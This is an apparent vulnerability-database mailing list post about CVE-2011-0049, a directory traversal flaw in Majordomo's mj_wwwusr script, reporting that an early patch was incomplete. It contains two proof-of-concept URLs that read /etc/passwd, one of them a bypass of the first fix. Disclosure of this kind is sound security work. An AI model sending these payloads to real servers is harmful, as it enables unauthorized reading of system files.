[VIM] CVE-2011-0049: majordomo directory traversal vulnerability
security curmudgeon
jericho at attrition.org
Thu Feb 10 23:38:05 CST 2011
OSVDB 70762, CVE-2011-0049, Secunia 43125, BID 46127, ISS 65113
Tenable Network Security discovered that the patch included in 20110130
was not sufficient to fully remediate this vulnerability. The patch
applied to snapshot 20110204 appears to remediate the issue correctly.
Please update your solutions to reflect this!
-------- Original Message --------
as you may be aware, there was a directory traversal vulnerability in
majordomo. PoC:
http://www.example.com/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=../../../../../../../etc/passwd
the VDBs all appear to be reporting build 20110130 as the fix, to include:
https://sitewat.ch/en/Advisory/View/1
http://secunia.com/advisories/43125
however, the patch included in 20110130 isn't sufficient. it can be
circumvented with the following PoC:
http://www.example.com/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=./../././../././../././../././../././../././../././../././../././../././.././etc/passwd
it appears this issue was fixed with 20110204.
More information about the VIM
mailing list